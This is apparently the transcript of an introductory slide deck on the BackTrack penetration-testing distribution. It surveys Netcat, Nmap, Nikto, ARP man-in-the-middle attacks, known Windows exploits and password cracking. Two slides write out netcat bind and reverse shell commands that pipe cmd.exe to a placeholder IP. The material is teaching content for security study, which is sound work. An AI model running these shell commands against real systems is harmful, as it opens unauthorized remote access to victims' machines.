slide1 n.
Download
Skip this Video
Loading SlideShow in 5 Seconds..
Introduction to BackTrack Local boot to remote root in just one CD PowerPoint Presentation
Download Presentation
Introduction to BackTrack Local boot to remote root in just one CD

Loading in 2 Seconds...

play fullscreen
1 / 25

Introduction to BackTrack Local boot to remote root in just one CD - PowerPoint PPT Presentation


  • 77 Views
  • Uploaded on

Introduction to BackTrack Local boot to remote root in just one CD Thought for the day, “Don’t learn to hack, hack to learn”..!!! - darknet.org.uk. Kunal Sehgal kun.seh@gmail.com. Introduction:

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'Introduction to BackTrack Local boot to remote root in just one CD' - cain-higgins


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
slide1

Introduction to BackTrack

Local boot to remote root in just one CD

Thought for the day, “Don’t learn to hack, hack to learn”..!!!

- darknet.org.uk

Kunal Sehgal

kun.seh@gmail.com

slide2
Introduction:
  • BackTrack is a suite of penetration testing/vulnerability assessment tools installed on a Linux Operating System, all wrapped-up on a bootable (live) CD
  • The most top rated Linux live distribution focused on penetration testing
  • Consists of more than 300 different up-to-date tools which are logically structured according to the work flow of security professionals
  • Rated #1 Security-Distro by insecure.org & sectools.org
slide3
Miscellaneous BT Services:
  • HTTP (Port: 80)
  • TFTP (Port: 69)
  • SSH (Port: 22)
  • VNC (Port: 5901)
slide4
Netcat:
  • A computer networking utility for reading from and writing to network connections on either TCP or UDP
  • Feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections
  • Bind Shell
  • Reverse Shell
slide5

Bind Shell:

Internet

Internet

NAT

Attacker

(Private IP)

Victim

(Public IP)

Attacker Connects to Victim (Incoming Traffic)

nc -v <IP> 4444

nc -lvp 4444 -e cmd.exe

slide6

Reverse Shell:

Internet

Internet

NAT

Attacker

(Public IP)

Victim

(Private IP)

Victim sends the shell (Outgoing Traffic)

nc -lvp 4444

nc -v <IP> 4444 -e cmd.exe

slide7
Nmap:
  • A security scanner used to discover computers and services on a computer network, thus creating a "map" of the network
  • Capable of discovering passive services on a network despite the fact that such services aren't advertising themselves
  • May be able to determine various details about the remote computers. These include operating system, device type, uptime, software product used to run a service, exact version number of that product, etc.
slide8
Nikto:
  • A scanner which performs comprehensive tests against web servers for multiple items
  • Includes over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers
  • Not every check is a security problem, though most are
  • There are some items that are "info only" type checks that look for items that may not have a security flaw, but the webmaster or security engineer may not know are present on the server
slide9
ARP Poisoning – Man In The Middle Attack:
  • MAC Address: Hardware address or physical address is a quasi-unique identifier assigned to most network adapters or network interface cards (NICs) by the manufacturer for identification
  • Address Resolution Protocol (ARP): A method for finding a host's hardware address when only its Network Layer address is known
  • Ettercap: A suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks
slide10

Network Using A Hub

Receiver

Sender

Attacker

Can easily sniff data

slide11

Network Using A Switch

Receiver

Sender

Attacker

Cannot sniff any data :(

slide12

Man In The Middle Attack

Receiver

Sender

Attacker

Hi everyone, I’m the switch

slide13
Exploits:
  • An exploit is a piece of software, a chunk of data, or sequence of commands that take advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur
  • Frequently includes such things as violently gaining control of a computer system or allowing privilege escalation or a denial of service attack
  • Zero Day Exploit: A threat that tries to exploit unknown, undisclosed or patchfree computer application vulnerabilities
  • www.securityfocus.com & www.milw0rm.com
slide14
Exploits (Conti…):
  • Attack / Exploit

Vulnerability

Payload

  • App
  • Protocol
  • O/S
  • Add a user
  • Get a remote shell
  • GUI access
  • Change routing tables
  • Etc.. Etc..
slide15
Exploit Frameworks:
  • A development platform for creating security tools and exploits
  • Used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide
  • A boon for script kiddies
slide16
Windows DCOM RPC Interface Buffer Overrun:
  • Exploits a vulnerability in Windows OS
  • The issue is due to insufficient bounds checking of client DCOM object activation requests. Exploitation of this issue could result in execution of malicious instructions with Local System privileges on an affected system
  • www.securityfocus.com/bid/8205
  • Bind Shell
slide17
IE IsComponentInstalled Buffer Overflow Vulnerability:
  • Exploits a vulnerability in an application (MS Internet Explorer)
  • Microsoft Internet Explorer is prone to a remote buffer-overflow vulnerability in the 'IsComponentInstalled()' method. A successful exploit results in arbitrary code execution in the context of the user running the browser
  • www.securityfocus.com/bid/16870
  • Reverse Shell
slide18
MS Windows Graphics Rendering Engine WMF:
  • Exploits a vulnerability in MS Windows WMF graphics rendering engine
  • The problem presents itself when a user views a malicious WMF formatted file, triggering the vulnerability when the engine attempts to parse the file
  • www.securityfocus.com/bid/16074
slide19
Passwords Hacking:
  • Why hack local passwords?
    • Install softwares – key loggers, trojans, etc
    • Gain access to another PC, Server, Router, etc.
    • People re-use passwords all the time
  • Types of attack:
    • Brute force Attack
    • Dictionary Attack
    • Rainbow Tables
slide20
Password Attack Vectors:
  • Online Attack: Attacking network services that require a user to log on, by guessing the correct password
  • Offline Attack: Attacking hash files that store encrypted passwords
  • Physical Access Attack: Attacking machines and other network devices, after gaining physical access
slide21
How To Hack Windows Passwords?
  • Available Tools: John The Ripper, Cain & Abel, Rainbow Tables
  • Gain access to the victim’s PC
slide22
Google Hacking:
  • Google hacking is a term that refers to the act of creating complex search engine queries in order to filter through large amounts of search results
  • In its malicious format it can be used to detect websites that are vulnerable to numerous exploits and vulnerabilities as well as locate private, sensitive information about others
  • http://johnny.ihackstuff.com
slide23
References:
  • www.remote-exploit.org
  • www.offensive-security.com
  • www.wikipedia.org
  • www.metasploit.com
  • www.irongeek.com
  • www.cirt.net/nikto2
  • www.sourceforge.net
  • www.securityfocus.com
  • www.darknet.org.uk
  • johnny.ihackstuff.com
  • www.oxid.it/cain.html
slide24
Questions??
  • Feel free to contact me:
  • Kunal Sehgal